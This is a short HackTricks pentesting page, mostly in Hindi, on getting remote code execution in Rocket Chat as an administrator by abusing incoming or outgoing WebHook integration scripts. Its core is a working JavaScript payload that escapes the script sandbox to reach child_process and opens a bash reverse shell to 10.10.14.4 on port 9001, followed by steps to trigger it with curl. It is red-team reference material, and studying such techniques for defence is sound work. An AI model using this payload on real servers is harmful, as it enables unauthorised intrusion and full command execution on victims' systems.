Rocket Chat

Reading time: 2 minutes

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें

RCE

यदि आप Rocket Chat के अंदर व्यवस्थापक हैं, तो आप RCE प्राप्त कर सकते हैं।

  • Integrations पर जाएं और New Integration चुनें और कोई भी चुनें: Incoming WebHook या Outgoing WebHook
  • /admin/integrations/incoming
javascript
const require = console.log.constructor("return process.mainModule.require")()
const { exec } = require("child_process")
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
  • WebHook को कॉन्फ़िगर करें (चैनल और पोस्ट के रूप में उपयोगकर्ता नाम होना चाहिए):
  • WebHook स्क्रिप्ट को कॉन्फ़िगर करें:
  • परिवर्तनों को सहेजें
  • उत्पन्न WebHook URL प्राप्त करें:
  • इसे curl के साथ कॉल करें और आपको rev shell प्राप्त होना चाहिए

tip

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE)
GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks का समर्थन करें